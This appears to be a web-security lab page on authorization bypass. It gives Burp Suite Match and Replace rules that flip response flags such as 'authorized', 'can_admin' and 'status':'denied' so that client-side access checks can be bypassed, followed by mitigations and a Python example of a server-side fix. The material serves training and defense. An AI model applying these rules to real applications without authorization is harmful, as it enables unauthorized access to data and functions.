Lab 6: Authorization Bypass

Authorization bypass via response manipulation vulnerabilities

Difficulty: Medium

Lab Overview

This lab demonstrates authorization bypass vulnerabilities in which an intercepting proxy such as Burp Suite modifies the authorization responses sent to the client, so that access controls enforced only on the client side can be bypassed.

Objective: Understand how authorization bypass attacks work and how to exploit them using Burp Suite.

⚠️ Authorization Bypass Warning

This lab demonstrates authorization bypass vulnerabilities:

  • Access Control - Bypass access controls
  • Role Bypass - Bypass role restrictions
  • Permission Bypass - Bypass permission checks
  • Resource Bypass - Bypass resource restrictions
Burp Suite Rules

Use these Burp Suite Match and Replace rules:

  • "authorized":false → "authorized":true
  • "can_read":false → "can_read":true
  • "can_write":false → "can_write":true
  • "can_delete":false → "can_delete":true
Authorization Bypass Rules
Access Control Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"authorized\":false", "string_replace": "\"authorized\":true" }
Read Permission Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"can_read\":false", "string_replace": "\"can_read\":true" }
Write Permission Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"can_write\":false", "string_replace": "\"can_write\":true" }
Delete Permission Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"can_delete\":false", "string_replace": "\"can_delete\":true" }
Admin Permission Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"can_admin\":false", "string_replace": "\"can_admin\":true" }
Status Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":\"denied\"", "string_replace": "\"status\":\"allowed\"" }
Vulnerability Details
  • Type: Authorization Bypass
  • Severity: High
  • Method: Burp Suite Match and Replace
  • Issue: Client-side trust of authorization responses
Attack Vectors
  • Access Control Bypass: Bypass access controls
  • Permission Bypass: Bypass permission checks
  • Role Bypass: Bypass role restrictions
  • Resource Bypass: Bypass resource restrictions
Authorization Bypass Examples

Use these Burp Suite Match and Replace rules to exploit authorization bypass vulnerabilities:

1. Access Control Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"authorized\":false", "string_replace": "\"authorized\":true" } // This rule bypasses access controls // Example: "authorized":false becomes "authorized":true
2. Read Permission Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"can_read\":false", "string_replace": "\"can_read\":true" } // This rule bypasses read permissions // Example: "can_read":false becomes "can_read":true
3. Write Permission Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"can_write\":false", "string_replace": "\"can_write\":true" } // This rule bypasses write permissions // Example: "can_write":false becomes "can_write":true
4. Delete Permission Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"can_delete\":false", "string_replace": "\"can_delete\":true" } // This rule bypasses delete permissions // Example: "can_delete":false becomes "can_delete":true
5. Admin Permission Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"can_admin\":false", "string_replace": "\"can_admin\":true" } // This rule bypasses admin permissions // Example: "can_admin":false becomes "can_admin":true
6. Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"status\":\"denied\"", "string_replace": "\"status\":\"allowed\"" } // This rule bypasses status restrictions // Example: "status":"denied" becomes "status":"allowed"
7. Role Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"has_role\":false", "string_replace": "\"has_role\":true" } // This rule bypasses role checks // Example: "has_role":false becomes "has_role":true
8. Permission Grant Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"granted\":false", "string_replace": "\"granted\":true" } // This rule bypasses permission grants // Example: "granted":false becomes "granted":true
9. Resource Access Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"access_granted\":false", "string_replace": "\"access_granted\":true" } // This rule bypasses resource access // Example: "access_granted":false becomes "access_granted":true
10. Feature Access Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"feature_enabled\":false", "string_replace": "\"feature_enabled\":true" } // This rule bypasses feature access // Example: "feature_enabled":false becomes "feature_enabled":true
Mitigation Strategies
  • Implement server-side authorization validation on every request, instead of acting on flags returned to the client
  • Use response integrity checks and signatures
  • Implement proper access controls
  • Use secure coding practices
  • Regular security testing and vulnerability assessments
  • Monitor for unusual authorization patterns
  • Implement proper input validation
  • Use role-based access control (RBAC)
  • Implement proper error handling
  • Educate users about security threats
  • Use multi-factor authentication
  • Implement proper logging and monitoring
  • Use authorization bypass detection tools
  • Implement proper audit trails
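To show why the issue listed above (client-side trust of authorization responses) makes server-side validation the essential mitigation, here is an added Python example that is not part of the lab: it applies two of the lab's Match and Replace rules to a constructed /check-access response and contrasts a client that acts on the flipped verdict with a delete endpoint that re-checks authorization on the server. The user store, endpoint and function names are assumptions.

```python
import json

# Constructed user store (hypothetical): user -> role.
USERS = {"alice": "user", "bob": "admin"}

# Two of the lab's Burp Match and Replace rules as (match, replace) pairs.
BURP_RULES = [
    ('"authorized":false', '"authorized":true'),
    ('"can_delete":false', '"can_delete":true'),
]


def apply_match_replace(body: str, rules=BURP_RULES) -> str:
    """Simulate a response_body Match and Replace rule set on a JSON body."""
    for match, replace in rules:
        body = body.replace(match, replace)
    return body


def check_access_endpoint(user: str) -> str:
    """/check-access as the lab describes it: a JSON verdict the client reads."""
    is_admin = USERS.get(user) == "admin"
    return json.dumps({"authorized": is_admin, "can_delete": is_admin},
                      separators=(",", ":"))


def client_delete_vulnerable(user: str, intercepted: bool = False) -> str:
    """Vulnerable flow: the client decides alone; delete has no server check."""
    body = check_access_endpoint(user)
    if intercepted:
        body = apply_match_replace(body)  # proxy rewrites the verdict in transit
    return "deleted" if json.loads(body)["can_delete"] else "denied"


def delete_endpoint_hardened(session_user: str) -> str:
    """Fix: authorization is re-derived from the server-side session identity."""
    if USERS.get(session_user) != "admin":
        return "403 denied"
    return "200 deleted"


def client_delete_hardened(user: str, intercepted: bool = False) -> str:
    """Same UI flow, but a tampered verdict only changes what the UI shows."""
    body = check_access_endpoint(user)
    if intercepted:
        body = apply_match_replace(body)
    if not json.loads(body)["can_delete"]:
        return "denied"
    return delete_endpoint_hardened(user)  # session identity, server-resolved
```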